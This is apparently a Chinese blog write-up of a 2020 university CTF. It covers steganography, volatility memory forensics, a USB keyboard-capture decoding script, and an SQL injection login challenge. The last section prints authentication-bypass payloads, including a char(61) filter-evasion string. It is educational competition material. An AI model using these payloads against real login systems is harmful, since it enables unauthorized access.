2020高校战“疫”赛部分 Write up

2020高校战“疫”赛

MISC

  • 0x01 简单MISC

下载文件后,猜测大概率是隐写,所以试着使用binwalk,发现图片有隐藏文件

%title插图%num

然后使用foremost分离,得到ctf.txt

得到一段摩斯密码:

%title插图%num

解码获取压缩包密码:

%title插图%num

最后base64解码获得flag:

%title插图%num

  • 0x02 2019-nCoV
    签到题

flag{shijiejiayou}

  • 0x03 ez_mem&usb

解压得到一个pcap文件,放进wireshark,导出HTTP对象得到upload_file.zip,解压得到data.vmem
分析镜像:volatility -f data.vmem imageinfo
查看进程:volatility -f data.vmem --profile=WinXPSP2x86 pslist
查看cmd进程:volatility -f data.raw --profile=WinXPSP2x86 cmdscan

发现password:weak_auth_top100
有了一个password,想到可能是有zip文件需要密码,所以尝试使用了foremost,查看得到的zip文件,打开需要密码,解压得到usbdata.txt

00:00:09:00:00:00:00:00
00:00:0F:00:00:00:00:00
00:00:04:00:00:00:00:00
00:00:0A:00:00:00:00:00
00:00:2F:00:00:00:00:00
00:00:23:00:00:00:00:00
00:00:26:00:00:00:00:00
00:00:1F:00:00:00:00:00
00:00:27:00:00:00:00:00
00:00:27:00:00:00:00:00
00:00:25:00:00:00:00:00
00:00:20:00:00:00:00:00
00:00:22:00:00:00:00:00
00:00:24:00:00:00:00:00
00:00:25:00:00:00:00:00
00:00:21:00:00:00:00:00
00:00:08:00:00:00:00:00
00:00:06:00:00:00:00:00
00:00:20:00:00:00:00:00
00:00:08:00:00:00:00:00
00:00:07:00:00:00:00:00
00:00:25:00:00:00:00:00
00:00:07:00:00:00:00:00
00:00:1F:00:00:00:00:00
00:00:04:00:00:00:00:00
00:00:23:00:00:00:00:00
00:00:21:00:00:00:00:00
00:00:08:00:00:00:00:00
00:00:24:00:00:00:00:00
00:00:20:00:00:00:00:00
00:00:09:00:00:00:00:00
00:00:08:00:00:00:00:00
00:00:26:00:00:00:00:00
00:00:1E:00:00:00:00:00
00:00:20:00:00:00:00:00
00:00:06:00:00:00:00:00
00:00:27:00:00:00:00:00
00:00:30:00:00:00:00:00

网上搜个脚本解密:

#coding:utf-8
import sys
import os
usb_codes = {
   0x04:"aA", 0x05:"bB", 0x06:"cC", 0x07:"dD", 0x08:"eE", 0x09:"fF",
   0x0A:"gG", 0x0B:"hH", 0x0C:"iI", 0x0D:"jJ", 0x0E:"kK", 0x0F:"lL",
   0x10:"mM", 0x11:"nN", 0x12:"oO", 0x13:"pP", 0x14:"qQ", 0x15:"rR",
   0x16:"sS", 0x17:"tT", 0x18:"uU", 0x19:"vV", 0x1A:"wW", 0x1B:"xX",
   0x1C:"yY", 0x1D:"zZ", 0x1E:"1!", 0x1F:"2@", 0x20:"3#", 0x21:"4$",
   0x22:"5%", 0x23:"6^", 0x24:"7&", 0x25:"8*", 0x26:"9(", 0x27:"0)",
   0x2C:"  ", 0x2D:"-_", 0x2E:"=+", 0x2F:"[{", 0x30:"]}",  0x32:"#~",
   0x33:";:", 0x34:"'\"",  0x36:",<",  0x37:".>", 0x4f:">", 0x50:"<"
   }
def code2chr(filepath):
    lines = []
    pos = 0
    for x in open(filepath,"r").readlines():
        code = int(x[6:8],16)   # 即第三个字节
        if code == 0:
            continue
        # newline or down arrow - move down
        if code == 0x51 or code == 0x28:
            pos += 1
            continue
        # up arrow - move up
        if code == 0x52:
            pos -= 1
            continue

        # select the character based on the Shift key
        while len(lines) <= pos:
            lines.append("")
        if code in range(4,81):
            if int(x[0:2],16) == 2:
                lines[pos] += usb_codes[code][1]
            else:
                lines[pos] += usb_codes[code][0]

    for x in lines:
        print(x)
if __name__ == "__main__":
    code2chr('usbdata.txt')

%title插图%num

WEB

  • 0x01 sqlcheckin

源码:

%title插图%num

sql注入的题目,看到登录框首先试下万能密码
admin' or 1=1-- -
发现应该是被过滤掉了
通过看大佬的wp知道是一种sql注入的新型万能密码
https://www.secpulse.com/archives/76200.html
通过构造false flase的逻辑错误,即ture
select * from users where username = 'mamba1'= 'x1' and passwd = 'mamba2' = 'x2'
上面这句sql语句等于
select * from users where ture
题目中=被过滤掉了,本来想使用like,但也不行。后面知道可以使用char(61)绕过
payload: username=mamba'%2bchar(61)%2b'&password=mamba'%2bchar(61)%2b'

总结:

这次比赛学到了sql注入的新型万能密码,git泄露,volatility取证工具,sql注入中一些绕过。
最后武汉加油,中国加油。

暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇